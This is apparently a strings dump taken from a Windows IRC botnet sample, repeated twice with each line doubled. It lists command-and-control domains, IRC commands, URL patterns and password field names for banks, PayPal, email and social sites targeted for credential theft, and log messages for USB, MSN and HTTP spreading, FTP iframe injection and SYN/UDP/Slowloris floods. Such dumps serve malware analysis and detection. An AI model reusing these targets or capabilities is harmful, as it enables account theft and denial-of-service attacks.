%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%Program Files%\Java\jre6\bin\jqs.exe
%Program Files%\Java\jre6\bin\jqs.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exe
\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exe
c:\%original file name%.exe
c:\%original file name%.exe
wuauclt.exe_1792_rwx_02700000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0q
tlSSSSSSSSSShL0q
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
